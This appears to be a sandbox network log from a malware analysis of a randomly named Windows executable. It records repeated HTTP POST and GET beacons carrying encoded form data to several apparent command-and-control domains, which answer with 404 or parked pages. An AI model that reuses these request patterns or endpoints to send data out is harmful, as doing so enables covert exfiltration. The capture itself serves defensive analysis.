                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mareomnia.com/ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&amp;9Zed=oJfxPJMXK">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.mareomnia.com Port 80</address></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.4 | 49746 | 66.96.162.130 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:03.875196934 CEST | 776 | OUT | POST /7w6o/ HTTP/1.1
                          Host: www.netgain360.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.netgain360.online
                          Content-Length: 204
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.netgain360.online/7w6o/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg=FyJXRb1x+fI4c8fmW+yGldPB+JwNeD8ccBhBoYibfRkYPvgtGEAL/wNTDjKcdW19i5RecuIsRrYNZdls68ALfcFg9cPUEIzyTIBYhtC0LoQCCCwxLQ0a7DTyr7xpyJniEMsy2ireA2d2HXgtk23e4Zm4iojKypxiiBrg0vfrOEhrPX+UCq0/XAD3wj3gyXh3BA==
                          Jul 1, 2024 15:12:04.359752893 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:04 GMT
                          Content-Type: text/html
                          Content-Length: 867
                          Connection: close
                          Server: Apache
                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                          Accept-Ranges: bytes
                          Age: 0
                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.4 | 49747 | 66.96.162.130 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:06.407419920 CEST | 796 | OUT | POST /7w6o/ HTTP/1.1
                          Host: www.netgain360.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.netgain360.online
                          Content-Length: 224
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.netgain360.online/7w6o/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg=FyJXRb1x+fI4adPmUZGG0tPGzZwNLz8YcGpBoc7WfiAYOLktHFAL6wNTIDKZT20xi5d8cvEsRr8NZfts6LcIeMFi18PaAIzyTIBYhu/8LoICCygxZh0Z4DTz8Lxpk5nmEMsQ2gPgA012HVotkkfdjJmyoIiI6qMssjCz0d/bIF1ODxvOTbVoFAnEtk+U/Uc+aA6qfDjrUv3D8eusJb99u3o=
                          Jul 1, 2024 15:12:06.882215977 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:06 GMT
                          Content-Type: text/html
                          Content-Length: 867
                          Connection: close
                          Server: Apache
                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                          Accept-Ranges: bytes
                          Age: 0
                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.4 | 49748 | 66.96.162.130 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:08.938555002 CEST | 10878 | OUT | POST /7w6o/ HTTP/1.1
                          Host: www.netgain360.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.netgain360.online
                          Content-Length: 10304
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.netgain360.online/7w6o/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:12:09.422924995 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:09 GMT
                          Content-Type: text/html
                          Content-Length: 867
                          Connection: close
                          Server: Apache
                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                          Accept-Ranges: bytes
                          Age: 0
                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.4 | 49749 | 66.96.162.130 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:11.469964981 CEST | 500 | OUT | GET /7w6o/?dBOL8fg=Iwh3SuFj0OMFYPToOdaCt8n09YMWVwcBCXZ5uIfRfjsROf0gJ1Ep/RQuBjSxRyYqk6VMa+wJUYkrYqg42OI1bOM95Oj9JPajS4UzxvnlYuQuHl4yeh0Z5Q8=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.netgain360.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:12:11.975930929 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:11 GMT
                          Content-Type: text/html
                          Content-Length: 867
                          Connection: close
                          Server: Apache
                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                          Accept-Ranges: bytes
                          Age: 0
                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.4 | 49750 | 203.161.49.220 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:17.123480082 CEST | 764 | OUT | POST /ov93/ HTTP/1.1
                          Host: www.hellokong.xyz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.hellokong.xyz
                          Content-Length: 204
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.hellokong.xyz/ov93/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg=1sQSBcKBcuEVfZnqK0Yes4kuoSJzkArNBjm3Mf81RcqzDygcHeozXCjuQ5QQkxT4LtKjfa019bghGQRgrI5QkgUoEuxxF0L6cO9s3Y7lDfFTAqR4k+AgS7zkC1bxvBHIh0z4BX/2q43sw/D1F5yD9Q16y7xHSkK0WJkxXNCzViDqROj20eU3PBNx8yx03S0R7A==
                          Jul 1, 2024 15:12:17.749577999 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:17 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.4 | 49751 | 203.161.49.220 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:19.661497116 CEST | 784 | OUT | POST /ov93/ HTTP/1.1
                          Host: www.hellokong.xyz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.hellokong.xyz
                          Content-Length: 224
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.hellokong.xyz/ov93/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg=1sQSBcKBcuEVZ6/qJTkepYktxiJztgrWBj63MaElSq6zAWocGfozaijuEpQV7BTjLtGRfbI19b0hGRhgr/NRkwUqd+xzB0L6cO9s3cTbDfNTAaB4lc4vMLzlF1bxlhHMh0ydBWibq6/sw/z1GtmCkA1g/bwITlviSJdYRNekdiyGdoyslv1gdBpCh14A6RJYgKeAG0ot7j+9UrAmqjwsrCo=
                          Jul 1, 2024 15:12:20.280612946 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:20 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.4 | 49752 | 203.161.49.220 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:22.188563108 CEST | 10866 | OUT | POST /ov93/ HTTP/1.1
                          Host: www.hellokong.xyz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.hellokong.xyz
                          Content-Length: 10304
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.hellokong.xyz/ov93/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg=1sQSBcKBcuEVZ6/qJTkepYktxiJztgrWBj63MaElSqyzDkwcH8wzbijuHpQU7BS7LtvYfbEl9YMhXH1gjtlRrwUqAuxyF0LVcPNg3Y3bDfNTAcl4lOAvOLzkC1b9vBGTh07gBW3mqJnswfj1HeeC7Q1+8bxXTlS8SJByROCCdhuGM8jzhvB/KBFr+Wdh7y4dv5C8BnELogaIO8ls4DgIyENUPjEXYCKW3bnU6TPHxSIr9lBpQV0XLYW0flNXtvbBoYiQIBekp01SdOj1B9Lj9OMKpbLL/3/SSRXJyBeSwbdSjesdSgO1Cm2T62OV5D9SM43PGBmYvG3GASB5bcFKczEat8uj6/aOMiN3dmEQ5BQ57xOhadFcZ04ayh2C+ijIAfvi+5c2hrIElGr6GkkEExpwk9oKwt0dRGPNJO2ptkHWhRUf3tlANW+yKUayTB5O+uIYQvQTVEtuFFs34O0q2aVWn6gfix90wHfiHOOno2EuzM31wGtYpYZ+owNTlu7zfjdEHymmtRbQFpROo6MQXpZDQYed6jBLAnLqz+d91FPcXClxyBgnVGuOxZRedjS7y0xyctIMiLcAMsCzPtjhMA74IVyfzhaI8uQ/C8wRpGF0T8OxGQtGWFsGzekpUhU0wjtvcpsvDzCTCV90FGT8gP3pGE9MH1UGfTMf2unaaP+XBGC7DPjt0H55vOmj6UpapN1SvYi2fKFic+X+qdnxXr6gScZe9JLvc3MPK/2tya1xyIBkYBciL5Z4mqKKlJi4TKUqFPSQLO4j+q4jpenba3ViWyBIuOdeO2GyviSaALsALWT7JR41R8X4ycWBUGB0mn9f+mY9BGpRItE4EFu+k/P4hTvGNP9T9JgJrAs20o0xev0a5kA4k2KipAalJfD9Stce2T36demrQdYlGIfSzxIB+eGuNcdujL4s0S3tqBCgzcKpbAF5JSJct4JPZQqGSSzcrara2/q6sLnY3DIB4WfWBApn8gxIIRPJKfjYahNK [TRUNCATED]
                          Jul 1, 2024 15:12:22.864697933 CEST | 533 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:22 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.4 | 49753 | 203.161.49.220 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:24.720112085 CEST | 496 | OUT | GET /ov93/?dBOL8fg=4u4yCo7OQPMCdKi2Ln8aiJAigi9vuRKQeDagcagOc8nEJXUOPucQWQe7OcI8vFTvM/uLBaUz+qY2H3sZqNwpjFxKCsR2JAuqbshkvfKiRYpiG9JChfURZOQ=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.hellokong.xyz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:12:25.323398113 CEST | 548 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:25 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.4 | 49754 | 142.250.74.211 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:30.379024029 CEST | 785 | OUT | POST /jabf/ HTTP/1.1
                          Host: www.artvectorcraft.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.artvectorcraft.store
                          Content-Length: 204
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.artvectorcraft.store/jabf/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg=HENjeYs7q32xBkzH0zdFbjdJD8iZ9pMwn0n85NrJl9VuxcEF58+HkBlV7ZuTMyVPjyKHBKbx8LvxxTMPKRtIPE5QdPF352DUCzssoBuNpEj2RWOwKdMUZjvUgeyCYkQSO55cOGsP6YftcykbAmMusPMP/byfuqEh7ceCIJpktM3fUBNN2u/bvJrmOf3U55ylPQ==
                          Jul 1, 2024 15:12:31.009145975 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Server: ghs
                          Content-Length: 1566
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Connection: close
                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                          Jul 1, 2024 15:12:31.009171009 CEST | 537 | IN
                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.4 | 49755 | 142.250.74.211 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:33.079741955 CEST | 805 | OUT | POST /jabf/ HTTP/1.1
                          Host: www.artvectorcraft.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.artvectorcraft.store
                          Content-Length: 224
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.artvectorcraft.store/jabf/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg=HENjeYs7q32xAA3H1Q1FcDdKG8iZkZM0n0r85MuOlOxuo5AF49+HnBlVz5uWTCUDjyWlBPzx8LTxxS8PLm5Pdk5WEfF53WDUCzssoBTgpE72SlWwK44XHzvb3uyCTEQeO545OEJq6cvtcw8bB3MtlPMJhrz9uoZ05svsDP0E0frLRHcXnfeM9JPVTY+g06PsUQ0QIL2U71eGryMqQYZIoNw=
                          Jul 1, 2024 15:12:33.724863052 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Server: ghs
                          Content-Length: 1566
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Connection: close
                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                          Jul 1, 2024 15:12:33.724921942 CEST | 537 | IN
                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          11 | 192.168.2.4 | 49756 | 142.250.74.211 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:35.610552073 CEST | 10887 | OUT | POST /jabf/ HTTP/1.1
                          Host: www.artvectorcraft.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.artvectorcraft.store
                          Content-Length: 10304
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.artvectorcraft.store/jabf/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: dBOL8fg= [TRUNCATED]
                          Jul 1, 2024 15:12:36.244460106 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Server: ghs
                          Content-Length: 1566
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Connection: close
                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                          Jul 1, 2024 15:12:36.244477987 CEST | 537 | IN
                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          12 | 192.168.2.4 | 49757 | 142.250.74.211 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:12:38.142066956 CEST | 503 | OUT | GET /jabf/?dBOL8fg=KGlDdtURhni7FGDH6yxlaDZJCfDxicUCgkjw8qWMo8hYydwJ4O2FhRAQ8quBHC5UmxGRc9Sg3+2UwlJVOzJUF0A3C6dQyjGkFiMq3W6NxA+1TkWWAbsUMwI=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.artvectorcraft.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:12:38.777293921 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Server: ghs
                          Content-Length: 1714
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Connection: close
